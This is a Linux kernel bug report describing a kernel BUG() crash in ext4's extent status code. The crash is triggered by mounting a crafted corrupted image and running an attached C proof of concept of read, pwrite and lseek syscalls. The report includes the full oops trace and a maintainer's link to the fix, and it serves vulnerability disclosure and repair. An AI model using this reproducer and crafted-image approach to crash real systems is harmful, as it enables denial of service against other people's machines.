Bug 200623 - BUG() in ext4_es_find_delayed_extent_range() when operating a corrupted image
Summary: BUG() in ext4_es_find_delayed_extent_range() when operating a corrupted image
Status: ASSIGNED
Alias: None
Product: File System
Classification: Unclassified
Component: ext4 (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: fs_ext4@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-07-22 19:50 UTC by Wen Xu
Modified: 2018-09-01 02:26 UTC (History)
2 users (show)

See Also:
Kernel Version: 4.18
Tree: Mainline
Regression: No


Attachments
The (compressed) crafted image which causes crash (20.65 KB, application/zip)
2018-07-22 19:50 UTC, Wen Xu
Details

Description Wen Xu 2018-07-22 19:50:46 UTC
Created attachment 277465 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t ext4 15.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <sys/syscall.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
	unsigned char v0[8192];
	unsigned char v1[8192];
	char v2[] = ".";
	char v3[] = "lost+found";
	char v4[] = "foo";
	char v5[] = "foo/bar";
	char v6[] = "foo/bar/hln";
	char v7[] = "foo/bar/æøå";
	char v8[] = "foo/bar/baz";
	char v9[] = "foo/bar/sln";
	char v10[] = "foo/bar/acl";
	char v11[] = "foo/bar/fifo";
	char v12[] = "foo/bar/xattr";
	long v13;
    
        chdir(argv[1]);
	v13 = syscall(SYS_open, (long)v7, 2, 0);
	syscall(SYS_read, (long)v13, (long)v0, 7424);
	syscall(SYS_pwrite64, (long)v13, (long)v1, 441, 6842);
	syscall(SYS_lseek, (long)v13, 3474, 3);

	close(v13);
	return 0;
}

= Kernel message
[13983.726442] EXT4-fs: Warning: mounting with data=journal disables delayed allocation and O_DIRECT support!
[13983.783120] EXT4-fs (loop0): mounted filesystem with journalled data mode. Opts: (null)
[14000.138283] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 0, block bitmap and bg descriptor inconsistent: 7011 vs 7022 free clusters
[14000.141268] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 1, block bitmap and bg descriptor inconsistent: 7037 vs 7038 free clusters
[14000.144276] ------------[ cut here ]------------
[14000.144284] kernel BUG at fs/ext4/extents_status.c:253!
[14000.145732] invalid opcode: 0000 [#1] SMP KASAN PTI
[14000.146787] CPU: 0 PID: 1576 Comm: a.out Not tainted 4.18.0-rc4+ #1
[14000.148076] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[14000.150039] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0
[14000.151300] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75 00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f 1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48
[14000.155067] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297
[14000.156124] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX: ffff8801db3c7ce8
[14000.157555] RDX: 0000000000001900 RSI: 0000000000001901 RDI: ffff8801ebfeb478
[14000.158975] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09: ffffed003d7fd6e3
[14000.160396] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12: 0000000000000000
[14000.161826] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15: 0000000000001900
[14000.163237] FS:  00007fcccc2fb700(0000) GS:ffff8801f7200000(0000) knlGS:0000000000000000
[14000.164835] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[14000.169757] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4: 00000000000006f0
[14000.171222] Call Trace:
[14000.171753]  ? ext4_iomap_begin+0x641/0x7a0
[14000.172616]  ? ext4_dio_get_block+0x80/0x80
[14000.173488]  ? ext4_file_read_iter+0xa0/0x170
[14000.174398]  ? __vfs_read+0x2a6/0x400
[14000.175152]  ? __vfs_write+0x286/0x410
[14000.175923]  ? kernel_read+0xa0/0xa0
[14000.176661]  iomap_apply+0xd7/0x200
[14000.177392]  ? iomap_seek_hole_actor+0x80/0x80
[14000.178302]  ? iomap_dirty_actor+0x310/0x310
[14000.179174]  iomap_seek_data+0x7c/0xb0
[14000.179942]  ? iomap_seek_hole_actor+0x80/0x80
[14000.180847]  ext4_llseek+0x123/0x160
[14000.181599]  ksys_lseek+0x9e/0xd0
[14000.182282]  __x64_sys_lseek+0x43/0x50
[14000.183053]  do_syscall_64+0x78/0x170
[14000.183816]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[14000.184854] RIP: 0033:0x7fcccbe174d9
[14000.185599] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 8f 29 2c 00 f7 d8 64 89 01 48
[14000.189398] RSP: 002b:00007ffc2ca310c8 EFLAGS: 00000286 ORIG_RAX: 0000000000000008
[14000.190913] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcccbe174d9
[14000.192341] RDX: 0000000000000003 RSI: 0000000000000d92 RDI: 0000000000000003
[14000.193782] RBP: 00007ffc2ca351b0 R08: 00007ffc2ca35298 R09: 00007ffc2ca35298
[14000.195216] R10: 00007ffc2ca35298 R11: 0000000000000286 R12: 0000000000400530
[14000.196652] R13: 00007ffc2ca35290 R14: 0000000000000000 R15: 0000000000000000
[14000.198107] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi autofs4 btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea crc32_pclmul sysfillrect sysimgblt fb_sys_fops ttm drm aesni_intel aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[14000.209140] ---[ end trace 56aa4821a2231d02 ]---
[14000.210125] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0
[14000.211577] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75 00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f 1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48
[14000.215601] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297
[14000.216700] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX: ffff8801db3c7ce8
[14000.218162] RDX: 0000000000001900 RSI: 0000000000001901 RDI: ffff8801ebfeb478
[14000.219648] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09: ffffed003d7fd6e3
[14000.221112] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12: 0000000000000000
[14000.222560] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15: 0000000000001900
[14000.224047] FS:  00007fcccc2fb700(0000) GS:ffff8801f7200000(0000) knlGS:0000000000000000
[14000.225707] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[14000.226874] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc5/source/fs/ext4/extents_status.c#L252

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Comment 1 Theodore Tso 2018-09-01 02:26:09 UTC
The fix for this problem is here:

http://patchwork.ozlabs.org/patch/964630/

Note You need to log in before you can comment on or make changes to this bug.